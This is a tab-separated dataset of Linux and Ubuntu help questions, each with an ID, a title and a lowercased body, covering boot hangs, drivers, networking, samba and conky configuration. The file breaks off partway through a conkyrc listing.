436921	occasional freeze at boot	my recently installed ubuntu ( and all the other distros i used before ) sometimes ( not-always ) hangs on boot . it 's a hard-to-debug problem because it just happens 'sometimes ' ( i never know when the boot will hang ) . when the problem arrives , the screen stops in a `` ubuntu purple '' empty screen , just after the `` purple grub '' screen . in the other distros , the boot used to stop in a black screen , which appears in the exactly same point of the `` ubuntu purple '' screen . i 'm relatively new to the gnu/linux world , so please , be patient .
436925	ownership of .xauthority transferred to root	somehow , while playing around with lightdm and webkit greeter , the ownership of the .xauthority file in my home dir was given to the root user and i could n't login because i had n't the privilegues to lock the file . i was able to regain ownership of the file and i could login again . ( after several hours of reinstalling lightdm and it 's greeters ) so now everything 's working fine again . but i 'd like to know how this happened . is this a bug in lightdm or webkit greeter or something else ?
436929	searching through output of more command	when searching through the output of more command how can i search for a phrase that includes spaces in between ? when i search for a phrase like `` typedef struct audiodev '' it does n't find the phrase in the file and i 'm assuming this is because i need to express the space between the words with a certain symbol .
436932	where i can find /sbin/hotplug in my kernel source	i am reading hotplug events . and i want to enable automatic loading unloading module , when a new device is added . for that i read that kernel does it using /sbin/hotplug script , but i am not able to find it in my source code , can someone help me out where can i find it ? also when i tried to do cat /proc/sys/kernel/hotplug there is nothing coming in output , i am running the same kernel which i downloaded and built .
436933	annotate email using alpine	i sometimes want to make personal notes on a specific email . currently , i do this using a fairly kludgey system , storing my notes for a given email in `` /usr/local/etc/anno/message-id '' ( actually , a slight variation of this ) . this works , but does n't integrate well with alpine . to read annotations , i have to know that a given message has an annotation and read the appropriate file . i 've used alpine 's pipe command and a few other tricks/filters to make this easier , but it 's nowhere near ideal . is there a better way to do this ?
436939	oracle java giving me trouble with strange warning . details below	heres the error : warning : current package is oracle-java8 , but binary format already installed by openjdk-7 . i used the purge command on openjdk before i tried to install oracle java 8 . now i 'm at a loss .
436940	internet dongle help ubuntu 12.04	i have a 3gmobile broadband dongle that is supposed to go on windows xp , vista , and 7 . is there any way i can use this dongle for ubuntu 12.04 ? model # - sct-um300
436941	how can i fix ubuntu	when i turn on my computer i have the choice of windows 7 and ubuntu . i click ubuntu and it shows wubildr is missing error : oxcoooooof . to fix that error i run bcdedit in a windows cmd-prompt , but it returns the following : the boot configuration data store could not be opened . access is denied . what should i do ?
436942	new lenovo x1 carbon 2nd generation - function key bar and vertical scrolling	i just installed ubuntu 13.10 on a new x1 carbon ( second generation ) and everything works fine so far . i adjusted the touchpad to disable `` tap-to-click '' and enabled `` middle-mouse-button '' and just fine tuning the touchpad ( it is really bad in the default setup ) . now i have two problems left : how can i make use of the function key bar ? i can use f1-f12 just fine , but with `` fn '' you should switch the oled to other keys . this does not work . brightness/settings/wlan key does not work either . how can i enable vertical scrolling with trackpoint and middle mouse button . on my lenovo t530 it worked out of the box .
436943	how to run a script when there is a change in your local ip ?	before marking as a duplicate : this is not about dynamic dns or similar things . i know how to run a script every time my networks goes up ; it is a simple matter of adding a script in the directory /etc/networkmanager/dispatcher.d like this one : # ! /bin/bash if= $ 1 status= $ 2 case `` $ 2 '' in up ) logger -s `` nm script up $ if triggered '' su rmano -c /home/romano/bin/myscript ; ; down ) logger -s `` nm script down $ if triggered '' ; ; * ) ; ; esac in my case , myscript is a very simple ifconfig -a > ~/dropbox/myifconfig.txt -- - i use it because i need to know my local ip from everywhere in the university , and it will change often . so far so good , the system works ok . but unfortunately the dhcp here is configured so that the ip sometime is changed without a down/up of the interface . in that case the script is ( logically ) not run , and the file is not updated . i can not use a dyndns approach because the change is in the local ip , not the externally visible one . i could poll , by simply putting the script in cron and execute it every minute or write a slightly more complex one ( ... if the ip is changed write the file otherwise do nothing ) and putting it again as a background task , but it is not elegant . so the question is : is there any way to trigger a script when my local ip changes ? update 1 i tried to put a script in /etc/dhcp/dhclient-enter-hooks.d/ , based on the existing /etc/dhcp/dhclient-enter-hooks.d/resolvconf , but it will not be triggered . i suspect ( confirmation needed ) that nm ( network manager ) is doing the dhcp negotiation by itself , without calling the dhcp command ...
436944	ubuntu 14.04 unity or gnome ?	there is no problem at this time with any software , as i am simply trying to get ready for 14.04 . do i need to uninstall the gnome from 13.10 or will everything upgrade properly . i can not find any information on the internet about 14.04 again , there is no bug .
436945	where is mysqldbcompare ?	the mysql docs refer to a utility mysqldbcompare . but it does n't seem like i have it installed , and when i type mysqldbcompare it does n't suggest any packages ( ubuntu 12.04 ) . where can i find this utility ?
436952	compressed block device	i wanted to experiment with combining bcache and a compressed block device on a hdd and seeing if this will speedup the boot time . are there any means of compressing a block device at the block level ? something like cloop but with read-write capabilies . the write need not be very fast . i was thinking of something similar to how the zram deals with it 's pages . i know the future will bring us ubiquitous ssds and stable btrfs with compression , but that really does n't scratch my itch now : p
436956	stop the recording after some period of time	i have a device that recording the video using the webcam with ffmpeg . it is working great , when the recording is started i am getting the usr1 signal . and after stoping the recording we receive the usr2 signal . but i want to stop the recording after 1 hour recording time . i do n't know but i think i have to pass the usr2 signal to the device after 1 hour . so how can i do this ... ! ! ! thanks in advance .
436957	some files uploaded to ubuntu one are not downloaded to one of the synced computers	i have a huge folder synced with ubuntu one , at some depth inside this folder there are some files that i can find on the web but that have not been downloaded to one of my synced computers . the files have been there for more than a month now and are just a couple hundred kb , furthermore , i can create files in the folder that contains these files and syncing works well . i do n't have any idea of why they are not being downloaded to my computer . thanks in advance .
436964	svn sqlite compiled for 3.7.17 , but running with 3.6.1	trying to update a svn working copy using svn update . i get the following error : svn : e200029 : could n't perform atomic initialization svn : e200030 : sqlite compiled for 3.7.17 , but running with 3.6.1 i am working with kubuntu 13.10 ( with latest updates ) . i think that this suggests an error in in the packages ( version mismatch ) . however i have this problem since a while and find only older similar reports on different os 's . so i wonder if something is wrong on my system . it would be useful to know what 3.6.1 is supposed to be the version of . it is of course not svn which is version 1.7.9 and sqlite -version yields 2.8.17 . edit it turned out that the apparent version mismatch is due to the to the simultaneous presence of a second version of sqlite ( version 3.6.1 installed by mathematica ) . since this installation path is in the environment variable ld_library_path svn seems to prefer this version and hence the mismatch . i could define an alias for svn or mathematica which exports ld_library_path before running the respective application , but i would prefer a more elegant solution . so , what is the recommended way to maintain two sqlite installations at the same time ?
436965	i3 windows manager resizing issue	i know the default key bindings are modkey+r then j , k , l , ; for directional resizing but i cant seem to get this to work , even though i see i have entered resize mode because there is a red notification at the bottom left saying `` resize ''
436966	how do i set the f77 environment variable to gfortran ?	i 'm new ubuntu ( and linux ) user . in order to do my senior project , i have to install psrchive i use this command to install psrchive ./psrsoft/bin/psrsoft psrchive -- no-cfitsio this is part of text which has been shown in terminal checking that c++ and fortran can be linked without conflicts ... no configure : error : the flags required to link the fortran runtime libraries : flibs= -l/home/boltfox/psrsoft/usr/lib -l/usr/lib/gcc/i686-linux-gnu/4.8 -l/usr/lib/gcc/i686-linux-gnu/4.8/../../../i386-linux-gnu -l/usr/lib/gcc/i686-linux-gnu/4.8/../../../../lib -l/lib/i386-linux-gnu -l/lib/../lib -l/usr/lib/i386-linux-gnu -l/usr/lib/../lib -l/usr/lib/gcc/i686-linux-gnu/4.8/../../.. -lgfortran -lm -lquadmath cause the linker to choose the wrong standard c++ libraries . please see http : //psrchive.sourceforge.net/third/cxx # f77 ex= $ ? if [ $ ex ! = 0 ] ; then exit $ ex fi build script failed ! so i go to http : //psrchive.sourceforge.net/third/cxx # f77 and check my gcc and g++ version which is 4.8.1 thanks for your help
436967	xsane produces an all black image	when using xsane i get an all black image when scanning . i also see this in dmesg . [ 1406230.387939 ] traps : xsane [ 17155 ] trap divide error ip:7f02f73e8bc8 sp:7fff0b4c44a0 error:0 in libsane-genesys.so.1.0.23 [ 7f02f73a8000+61000 ] [ 1406353.157940 ] traps : xsane [ 18372 ] trap divide error ip:7f61d73e8bc8 sp:7fff0ea9b050 error:0 in libsane-genesys.so.1.0.23 [ 7f61d73a8000+61000 ] [ 1406493.163511 ] traps : xsane [ 24989 ] trap divide error ip:7fb59a400bc8 sp:7fff9149a380 error:0 in libsane-genesys.so.1.0.23 [ 7fb59a3c0000+61000 ] [ 1406577.915599 ] traps : xsane [ 25108 ] trap divide error ip:7f3905110bc8 sp:7fff1d10d8a0 error:0 in libsane-genesys.so.1.0.23 [ 7f39050d0000+61000 ] [ 1406786.933920 ] traps : xsane [ 25150 ] trap divide error ip:7fba65328bc8 sp:7fff8d087a80 error:0 in libsane-genesys.so.1.0.23 [ 7fba652e8000+61000 ] this is using xsane-0.998 .
436968	how to install cryptote	cryptote instructions for ubuntu indicate that deb should be invoked . my 12.04 ( precise ) system shows there is no such command . what 's wrong with this installation procedure ? import repository public key : wget -o- https : //panthema.net/repo/key.asc | apt-key add - or with sudo : wget -o- https : //panthema.net/repo/key.asc | sudo apt-key add - add binary repository line to /etc/apt/sources.list : deb http : //panthema.net/repo/ubuntu precise main update package listings and install the package cryptote : apt-get update apt-get install cryptote note that i had to use sudo for wget as well as for apt-key so there might be an error in that regard .
436970	is bitcoin core v.0.9 not updated on ppa ppa : bitcoin/bitcoin ?	version 0.9 of bitcoin-qt just came out . when will ppa : bitcoin/bitcoin be updated ? in the meanwhile , any steps showing how to upgrade are welcome ! equally posted on http : //bitcoin.stackexchange.com/questions/23773/is-bitcoin-core-v-0-9-not-updated-on-ppa-ppabitcoin-bitcoin
436974	does lubuntu have a future ?	i have some old , lower-end hardware ( p4 , 2.0 ghz , 1 gb ram ) onto which i have installed lubuntu 13 . 10 as my first venture into linux . for the most part , everything has been fine and the learning curve has n't yet been too bad to overcome . the machine is mostly being used for web browsing and basic office type functions using libreoffice . after reading this post , https : //wiki.ubuntu.com/lubuntu/testing/14.04 , i 'm wondering about the future of lubuntu and whether i should stick with it . my plan for this particular machine was to upgrade it to lubuntu 14.04 ( hopefully it will released as a lts version ) and then give this machine to a relative who needs something for basic tasks . is it worth sticking with lubuntu for something like this ( a lts release will probably outlive the machine 's usefulness ) or does it look like there is n't a future for lubuntu and i should look into one of the other minimal distros .
436975	what is the public address of installed app ?	i 've installed discourse , wordpress , etc by juju . the below show the result for discourse . how can i see it in my browser ? what 's the address ? juju status environment : local machines : `` 0 '' : agent-state : started agent-version : 1.17.5.1 dns-name : localhost instance-id : localhost series : saucy `` 1 '' : agent-state : started agent-version : 1.17.5.1 dns-name : 10.0.3.3 instance-id : onrea-local-machine-1 series : precise hardware : arch=amd64 `` 2 '' : agent-state : started agent-version : 1.17.5.1 dns-name : 10.0.3.121 instance-id : onrea-local-machine-2 series : precise hardware : arch=amd64 services : discourse : charm : local : precise/discourse-0 exposed : true relations : db : - postgresql discourse : - discourse units : discourse/0 : agent-state : started agent-version : 1.17.5.1 machine : `` 1 '' public-address : 10.0.3.3 postgresql : charm : cs : precise/postgresql-62 exposed : false relations : db-admin : - discourse replication : - postgresql units : postgresql/0 : agent-state : started agent-version : 1.17.5.1 machine : `` 2 '' open-ports : - 5432/tcp public-address : 10.0.3.121
436976	ethernet not working in ubuntu 13.10	i have ethernet wired which works fine in windows but shows unplugged in ubuntu 13.10 . wifi scans and shows near by search results but i dont own a router . i guess i might need to update driver but how am i supposed to download the driver when i cant connect to internet ? how can i get the ethernet working ?
436978	my wireless card does not work	everything was working just fine until i followed the instructions here .now the driver seems to be there but for some unknown reason the wireless card can not connect to any network . lspci | grep network network controller : realtek semiconductor co. , ltd. rtl8723ae pcie wireless network adapter here is the results of running iwconfig iwconfig wlan0 ieee 802.11bgn essid : '' ssid-e5172-dc7b '' mode : managed frequency:2.462 ghz access point : not-associated tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off encryption key : off power management : off i was thinking , when i first installed ubuntu 13.04 , ubuntu automatically installed the right network drivers.so , can i make it do that without having to reinstall it again ? ?
436988	installing windows alongside ubuntu on last partition	i have ubuntu 12.04 installed on my system.i wish to resize my /home ( extended ) partition and install windows 7 in the free space . this would result in windows being installed on the last partition on my hard disk . i have previously setup dual boot systems , but with windows on the first partition and recovered grub from the live cd when needed . i want to know if there are any known issues i could face in installing windows to the last partition .
436991	ubuntu server 13.10 - shutdown/reboot does not work	i recently installed ubuntu server 13.10 on a dedicated machine . i usually only log in via ssh , since there is no monitor attached . however , using sudo shutdown -h or sudo reboot now does not work . after connecting a monitor , i saw that : killing all remaining processes ... [ failed ] is this a common problem ? is there a fix ? since i need to move the system to another location soon , i need it to be able to reboot per ssh .
436992	installation ubuntu on ibm x3650 m4 server	0 down vote favorite i 'm trying to install ubuntu 12.04 lts on an out-of-the-box ibm server x3650 m4 . basically , since it 's using a m5110e raid controller , it does n't detect the hard disks , as the certification page says : http : //www.ubuntu.com/certification/hardware/201203-10669/ it also says that the workaround would be to `` configure at least one logical volume using your installed hard disks for them to be recognized by the installer '' . i 'm fairly new at working with raid/partitioning , so i 'm not quite sure what would be the best way to do this . my question is : what would be the easiest way to create the logical volume so that i can successfully install ubuntu ? currently i 've only got the ibm firmware installed on the server , nothing else .
436995	`` no bluetooth adapters found '' error on ubuntu 12.04	i use hp pavilion g6-2304tx . initially it came with windows 8 . then i uninstalled windows 8 and installed ubuntu 12.04 lts . bluetooth was turned off while removing windows 8 . now i am not able to use bluetooth . when i open `` bluetooth '' , a message `` no bluetooth adapters found '' is shown . please help me resolve this issue .
436998	canon lide 90 not supported by linux	i found this site verifying information on this device to better help you ? ? http : //www.sane-project.org/unsupported/canon-lide-90.html or you can visit http : //www.usa.canon.com/cusa/support/consumer/scanners/canoscan_series/canoscan_lide90 the device verifies that is not supported for any linux operating systems . ? ? what is the best way to go about getting this issue taken care of ? ? any developers already working on this ? ? thank you .
436999	how do i diagnose `` there was an error launching the application '' ?	i created a my-app.desktop file for a program i wrote . when i double-click it , i get the error message `` there was an error launching the application '' . how can i get more detailed information about what the problem is ? i saw a reference to a `` details '' section of the dialog box , but there is nothing like that present in the one i see . if i were on my mac , i 'd open the console app to see if any errors were logged , but i have n't learned of anything similar on ubuntu . ( note that unlike other similarly-titled questions , i am not asking what 's wrong with this particular .desktop file ; i want to know how to find out in general . )
437005	how to rename deb package ?	i get package source by typing : sudo apt-get source nginx and added -- add-module=/usr/src/nginx-rtmp-module \ string to debian/rules how i can rename packages from nginx-* to nginx-rtmp-* ?
437012	vpn connection only for specific service or port	i rented a virtual machine and i want to use an vpn service inside for privacy like hidemyass & co . i connect to the vm via vnc , but everytime i switch on the vpn in the vm the vnc connection fails . i use pptp as vpn . is there an easy way to exclude vnc from the vpn . there are a few computers that will connect to the vm so excluding single ips would also work , but i prefer the vnc or port solution . im a noob in routing so i need a pretty finished answer : d thanks
437015	whenever i suspend when i resume my screen is just black	i am running ubuntu 12.04 on a sony vaio machine . system has ran ubuntu for over 18months and never has this happened before . constantly keep update with all updates , however the last half dozen times i have put it into suspend ( just shut lid ) when i come to wake it up all i have is a totally black screen . no mouse cursor- just blackness ! can anyone help please ? thanks
437016	unable to type commands in terminal	i was install mpi and i have given the path for it in the .bashrc and i closed my terminal and after some time again i opened terminal it 's showing following error in the very first line followed by my terminal prompt and i was unable to type anything in my terminal prompt means it is not accepting my key strokes from keyborad bash : linux : no such file or directory ubuntu linux @ terminal : ~ $ ( here linux is my username ) for that i searched and i found one solution is that remove the things which i have updated to the .bashrc . after doing this again i opened the terminal now the error message is not coming but in the terminal prompt i am unable to type anything
437019	gem5 : ca n't load object file tests/test-progs/hello/bin/x86/linux/hello @ cycle 644368	using gem5 simulator for my project used- scons build/x86/gem5.opt then trying execute precompiled hello world program using- build/x86/gem5.prof configs/example/se.py -c tests/test-progs/hello/bin/x86/linux/hello and getting error- fatal : ca n't load object file tests/test-progs/hello/bin/x86/linux/hello @ cycle 644368 [ create : build/x86/sim/process.cc , line 613 ] memory usage : 644368 kbytes program aborted at cycle 0 aborted ( core dumped ) kindly help how to resolve it .
437021	ubuntu 13.10 does not detect windows 8.1 partition	hi there i 'm trying to install ubuntu 13.10 on my compaq cq58 dual core 1.4 8gb ram , but when i 'm installing the ubuntu does not detect my 2 partition only shows as an empty disk . please help me
437022	failed to mount /home in ubuntu	while booting up ubuntu , i am getting some error messages which shows that /home fails to mount . i am attaching the image . how can i solve this issue ?
437023	how can i get phppgadmin to work ? i keep getting a 404 .	i installed phppgadmin , restarted apache and everything , yet visiting http : //127.0.1.1/phppgadmin , http : //localhost/phppgadmin or http : //localhost/phppgadmin does n't seem to work . i keep getting a 404 . how can i get phppgadmin to work ?
437027	reliable uefi gpt multiboot environment creation for ubuntu on thinkpads	dear ubuntu community members , i am planning on a fresh multiboot installation environment which initially includes ubuntu for general open software development , windows 7 pro and later on maybe other oses . computer model i will be using is a thinkpad w520 with latest system firmware . my reported disk size is 465,76gb . deadlock is : i prefer to have a more reliable gpt based harddisk partitioning scheme instead of mbr . contrary to other oses , windows lets gpt partitioning only if the system 's firmware is uefi enabled . even if i have had before enabled this generically may be buggy uefi as default firmware and installed windows 7 pro with fresh gpt partition with no big issues , i was n't certainly able to assure same production environment reliability for any other oses including ubuntu . unspecific reported uefi linux installation risks include bricking ! system motherboard even on newest generation thinkpads , and also latest w540 models . i would be glad if you experienced users can address my interdependent uefi *nix multiboot installation questions and concerns , which may also hopefully help us to better document the overall experience on these particular thinkpad systems . i am planning depending on microsoft bootloader if there is not a established consensus that prevents microsoft from wiping others , does it have any drawbacks on non-ms side , do i have another reliable/surefooted alternative approach ? i will be reserving only a small ( 120-160gb ) ntfs formatted gpt partition for windows at the end of the disk space , ie . at the innermost physical sectors . 100mb ms reserved partition , ~300gb blank partition left unformatted for ext4 formatting during ubuntu installation , and lastly if i do n't left any extra blank partition for unix lastly a 120-160gb ntfs partition for windows use . is it safe to use windows setup partitioners , diskpart , etc . for gpt/mbr partitioning ? what about 100mb reserved and 125mb uefi partition use out of windows , should i salvage them or let stay ? and do you have any amendment to partitions/partitioning that may be useful in a multiboot environment , ie . i am beware of more partitions leading to lost space , but also concerned in resulting swap performance and fail safe conditions of not creating a home ( i hope through live boot i can any time recover or clean reinstall without deleting some backup folders on a single ext4 ? ) ? i am planning file sharing through lightweight virtual machine shared folders when in windows or *nix . there will be no intermediary partition and almost all files will reside natively on single ext4 partition of ubuntu . i do n't want to have any separate partition for swap or home , would that impact swap file contagiousness and performance on ubuntu , ( though , hopefully surely it will prevent moving files between separate ext4 physical partition locations of os and home ) ? i have intended to keep my questions and setup generic so that its resolution may help millions of other uefi linux multiboot use case and especially uefi bricking prone thinkpad alike mobile computers . i may just use mbr and bios old style , but your replies will be really useful for my installation environment resolution considerations . thank you in advance .
437031	finding volume label of a usb mass storage device using python	could someone please tell me how i could obtain a usb mass storage device 's volume label ( the name displayed in the explorer , not the device name : :/dev/sdx ) using python ? libraries/modules though hal has deprecated so please do n't suggest it as an option .
437035	how to delete ubuntu 's hidden or trash files and folders ( like .trash-1000 ) on windows volumes , from windows ?	previously i used have ubuntu on my laptop , but currently i am using windows 8 . i found .trash-1000 file appearing in my drive . i knew that this is due to deleting few files while using ubuntu . how to delete that file in windows 8 ?
437036	enter key not working after xmodmap change	mistook key number for another key , now i cant get it back to working . tried : xmodmap -e `` keycode 36 = return nosymbol return '' xmodmap -e `` keycode 36 = return '' xmodmap -e `` keycode 36 = enter nosymbol enter '' the keypress is recognized in xev , but i cant get it to actually perform the function of enter or return . the keypad enter key still performs as necessary . linux semperauditio 3.11.0-18-generic # 32-ubuntu smp tue feb 18 21:11:14 utc 2014 x86_64 x86_64 x86_64 gnu/linux
437040	what is the name of the `` username @ hostname : ~ $ '' line ?	simple question ! what is the name of the ubuntu @ ubuntu : ~ $ or the username @ hostname : ~ $ line ? how should i refer to it ?
437041	ubuntu 2d working fine , but not ubuntu virtual machine in vmware wokstation 9 windows 7 host	i 'm using windows 7 as the host machine with vmware workstation 9 . i created a virtual machine ubuntu desktop 12.04 tls 64 bits . there are two options for log in ubuntu and ubuntu 2d . whenever i log in to ubuntu , the task bar will not show up , is like having a black margin all around the desktop background and only the center is visible . i wish i could attached a pic , but i need at least 10 reputation . when i move my mouse over the left side of the desktop i can see that something is there but it is shown only as a black square . i tried deleting the virtual machine i created for ubuntu and re-installed it , but it keeps appearing like that . when i switched to log in 2d everything worked alright . i could see the task bar , the icons , the clock , ... what might be causing this problem ?
437042	help with synaptiks touchpad	i bought a laptop 2 weeks ago , wiped windows8 off and installed ubuntu 12.04 . i 've been trying to install synaptiks for the past 6 days trying multiple fix 's , so i could configure my touchpad because the touchpad hits my left palm when i type and consistently erases most things because of it and i cant 2 finger vert scroll . i believed the problem was related to my touchpad driver but i had the its-saucy synaptics installed for everything . when i use xlist it shows my touchpad is identified yet when i run synaptiks it says it ca n't find a touchpad . any help greatly appreciated . the internal error i have is : executablepath : usr/bin/synaptiks package : kde-config-touchpad 0.8.1-1ubuntu1.2 problemtype : crash title : synaptiks crashed with attributeerror in show_configuration_dialog ( ) : 'synaptiksnotifieritem'object has no attribute 'touchpad' traceback : file '' usr/lib/python2,7/dist-packages/synaptiks/kde/trayapplication.py '' , line 260 , in newinstance self.icon.show_configuration_dialog ( ) file '' usr/lib/python2.7/dist-packages/synaptiks/kde/trayapplication.py '' , line 241 , in show_configuration_dialogself.touchpad , self.touchpad_manager , self_config ) attribute error : 'synaptiksnotifieritem ' object has no attribute 'touchpad' apportversion : 2.0.1-0ubuntu17.6 architecture : amd64 distro : ubuntu 12.04 if there 's any directory spelling mistakes it 's because i typed it all out
437045	can not add secondary drive to ubuntu one ?	so , i have a 120gb ssd that has my os on it , then have a 1tb that stores all my docs , games , music , etc . anyway , i 'm trying to add the music folder on the 1tb which is given the d : drive letter , where as ubuntu one is installed on the c : drive or ssd . long story short when i try to add the music folder from the d : drive to the ubuntu one , it gives me the following error : the chosen directory `` d : \itunes\itunes media\music '' is not valid . please choose a folder inside your `` c : \users\david '' directory , and not overlapping with any existing cloud folder . here 's a screenshot trying this in windows since that 's where the music is downloading to at the moment .
437046	ubuntu wireless , bluetooth and mouse issues on lenovo flex 15	i recently installed ubuntu with gnome onto my lenovo flex 15 . the install ran fine and i gave the os 200gb and shrank my windows 8 to 250gb ( it is dual booted ) . i restarted my computer after the install and everything worked fine , wifi , bluetooth , touchpad and touchscreen . i then installed a few apps ( chromium and gparted ) and updated . it told me to restart so i did . everything still worked fine . i played around with the new gnome environment for a bit ( not changing any settings , just using apps ) and shut the computer down . i came back the next day and the touchpad and touchscreen do n't work ! ! ! then i realise that the bluetooth icon has disappeared and so has wifi ! ! ! i plugged in a usb mouse and it worked , but i can not find a way to fix these three problems . please help ! ! !
437052	ubuntu 13.10 on acer v5-472 with hd 4000	i have an acer v5-472 with intel hd4000 graphics chipset and a built-in 1366*768 display . i have installed ubuntu 13.10 amd64 in legacy boot mode with an external monitor . installation showed no problems , i can boot from hdd and log into my system . the internal display does n't work and i have to use an external monitor . i have tried the following ( found in other threads ) to no avail : setting grub option `` acpi_backlight=vendor '' or `` acpi_osi=linux '' or both . installing the intel hd drivers for linux from their homepage . running in circles , screaming and shouting . the internal display lights up ( i can change the brightness with fn-left and fn-right ) but that 's all . when i boot , i get a purple splash screen and from then only the external monitor works . i read somewhere that this might be a problem with kernel 3.11 ? has anybody ubuntu running on an acer v5-472 ? should i change ubuntu version or use 32-bit instead ? in general , how can i get the internal display to work ? edit : the settings- > display dialogue shows the internal display correctly with supported resolution of 1366 .
437055	adding file paths to python code	i am currently running the code for a program called hotnet . in its simplerun.py file , there is a place to insert a file path to be run . parser.add_argument ( '-mf ' , ' -- infmat_file ' , required=true , help='path to .mat file containing influence matrix ' ) my path file is /home/lai/downloads/influence_matrix_files/hprd_inf_.mat ; and i have tried to add it in as such : parser.add_argument ( '-mf ' , ' -- infmat_file ' , required=true , help= /home/lai/downloads/influence_matrix_file/hprd_inf_.mat ) but i get syntaxerror when running the code : file `` simplerun.py '' , line 29 help= ~/home/lai/downloads/influence_matrix_files/hprd_inf_.mat ) ^ syntaxerror : invalid syntax i have also tried to place the path in quotes ( as strings ' ' ) but that is n't processed . i have tried removing the / however that just returns the following error : nameerror : global name 'home ' is not defined how do i fix this ?
437056	upgrading an ubuntu cluster	i currently have a cluster of servers with 7 nodes running ubuntu 10.04 lts . i 'm looking to upgrade to 14.04 lts next month . i am unable to have all 7 nodes offline at the same time . is it possible to run the cluster with mixed os versions until i complete the full upgrade ? ( could some be running 14.04 while the rest is still on 10.04 ) .
437059	linux command to prevent dos attack by using netstat and iptables	i want to drop more than 200 requests per ip to prevent ddos attack . this is command that i used to detect requests count per ip : netstat -alpn | grep :80 | awk ' { print $ 5 } ' |awk -f : ' { print $ ( nf-1 ) } ' |sort | uniq -c | sort -nr now i want add all ip addresses that made more than 200 requests into iptables to drop input and out put .
437061	how do you share a directory with a ubuntu 12 vm running samba , on windows 8 hyper-v ?	ideally i 'd like to be able to edit files in a shared directory on my windows desktop , and make them available to the ubuntu server vm as a mounted drive or folder . there are dozens of guides explaining how to setup samba and shares , or ubuntu on hyper-v , but i 'm having a heck of a time finding how to setup file sharing with samba on windows hyper-v vms . for one i dont even know what host name to use or what network path to use in the samba configs . i thought i was using the right paths but it doesnt appear to work . any help/guides/links are appreciated . windows 8.1/ubuntu 12.10 server
437064	executable not created after rosmake	this error am facing is strange and am not able to resolve this over 5 days . your help is much appreciated . i have detailed the issue below . i compiled a ros package known as tum_ardrone . before running rosmake , the ld_library_path was /opt/ros/fuerte/lib when i ran rosmake tum_ardrone it showed the following error undefined reference to `dgemm_' i concluded that the error was related to missing links , through lapack and blas , and thus included the following into ld_library_path . /opt/ros/fuerte/lib : usr/lib i tried rosmake againa nd still got the error . after that , i modified the ld_library_path to just /usr/lib and the pakcage was compiled without errors . however , all exe 's pertaining to the package was created except one . the exe was defined and included in the cmakelists.txt file as well . however the exe named drone_stateestimation was not created . and this is the exe that is connected to lapack and blas , the reason for those errors this has nothing to do with the package . it is a generic issue , i hope since the same package works fine in another laptop . i even tried reinstalling/downloading a new copy the package , but no use . can anybody please tell me what could be the problem ? is there another interpretation for the following error , or a direct solution ? undefined reference to `dgemm_' please help . i have been stuck for really a long time .
437065	wifi mt7601 not installing	my system is a dell dimension 3000 , running xubuntu . i am struggling to install a wifi using ralink mt7601 . the driver cd is in windows . i have been trying to install ndiswrapper according to instructions provided here https : //help.ubuntu.com/community/wifidocs/driver/ndiswrapper but that does not work either . it asks to use synaptic and the latest xubuntu doesnot have synaptic package manager . any suggestions , please ? thank you .
437071	steam on ubuntu 14.04 error . ca n't isntall steam	it displays a dependency error after i tried to install it on 14.04 . this is a fresh install and i have tried to install from both the valve website and the ubuntu software centre . it fails in either case . the error it comes up with the following error : the following packages have unmet dependencies : steam-launcher : depends : jockey-common but it is not going to be installed depends : libc6 ( > = 2.15 ) but 2.19-0ubuntu2 is to be installed how can i solve this ?
437076	dell inspiron 15r 5521 8730 ati driver problems	i bought a new dell inspiron 15r 5521 and installed 12.04 ubuntu on it . but i have a few annoying problems here : 1 . its cpu fan is blowing too much and it makes me angry because it sounds like airplane turbo jet ! 2 . a driver which does n't work . i restarted the computer after installing the driver and it went grey screen or does not boot up properly 3 . its brightness can not be decreased if anyone has experienced the same problem please help me out here ; it would be appreciated .
437077	ibook g3 only capable of manually booting	my ibook g3 is only capable of booting manually on ubuntu 12.04 lts . when in manual boot , it comes up with a giant terminal . at this terminal , it says : root filesystem check failed before the terminal appears , it says a bunch of numbers and letters and under that : continue to wait , or press s to skip mounting or m for manual recovery waiting does nothing , and so does pressing s. so i reboot for the third time and press m , for manual recovery . i put in stuff and the only thing that works is sudo reboot . what does this mean and how do i fix it ?
437081	itunes2rhythm python3 script returns syntax error	i am trying to execute this script with python3 itunes2rhythm using this command : python3 /media/trunk/sounds/itunes/itunes2rhythm-master/itunes2rhythm.py i am getting the error : traceback ( most recent call last ) : file `` /media/trunk/sounds/itunes/itunes2rhythm-master/itunes2rhythm.py '' , line 285 , in < module > exec ( open ( sys.argv [ 0 ] [ : -2 ] + '' conf '' ) .read ( ) , cfg ) file `` < string > '' , line 20 ilib= '' '' /media/trunk/sounds/itunes/library.xml '' '' ^ syntaxerror : invalid syntax could someone explain what needs to be done to execute this script properly ?
437083	mounting/unmounting devices	i mount a device with this commands : sudo mkdir /media/ ( device uuid ) sudo mount ( device path ) /media/ ( device uuid ) then when it comes to unmount it : sudo umount ( device path ) sudo rmdir /media/ ( device uuid ) the problem is that when i do this , the icon remains the launcher , but if i mounted and unmounted the same device using the mouse ( not using the command line ) there will be no problem . how can i get the same result than doing it graphically but using the command line ?
437084	attempting to run conky w/ mod of conkyrc_lunatico theme called conkyrc_seamod . help	okay so i have put the necessary files into a .conky folder in my home directory . when i type in the following command i get the response that proceeds the command : $ conky -c ~/.conky/conkyrc_seamod conky : statfs '/media/data ' : no such file or directory conky : forked to background , pid is 17784 alkemist @ megatron : ~ $ conky : desktop window ( 1400095 ) is subwindow of root window ( 1e4 ) conky : window type - normal conky : drawing to created window ( 0x4400002 ) conky : drawing to double buffer conky : statfs '/media/data ' : no such file or directory conky : obj- > data.i 3 info.cpu_count 2 conky : attempting to use more cpus than you have ! here is the conkyrc_seamod file in the gedit text format : background yes update_interval 1 cpu_avg_samples 1 net_avg_samples 2 temperature_unit celsius double_buffer yes no_buffers yes text_buffer_size 2048 gap_x 30 gap_y 70 minimum_size 300 900 maximum_width 350 own_window yes own_window_type override own_window_transparent yes own_window_argb_visual yes own_window_type normal own_window_class conky-semi own_window_hints undecorate , sticky , skip_taskbar , skip_pager , below border_inner_margin 0 border_outer_margin 0 alignment tr draw_shades no draw_outline no draw_borders no draw_graph_borders no override_utf8_locale yes use_xft yes xftfont caviar dreams : size=10 xftalpha 0.5 uppercase no # defining colors default_color ffffff # shades of gray color1 dddddd color2 aaaaaa color3 888888 # orange color4 ef5a29 # green color5 77b753 # loading lua script for drawning rings lua_load ~/.conky/seamod_rings.lua lua_draw_hook_post main # # system information using conky capabilities # header with base system info text $ { font ubuntu : size=10 , weight : bold } $ { color4 } system $ { 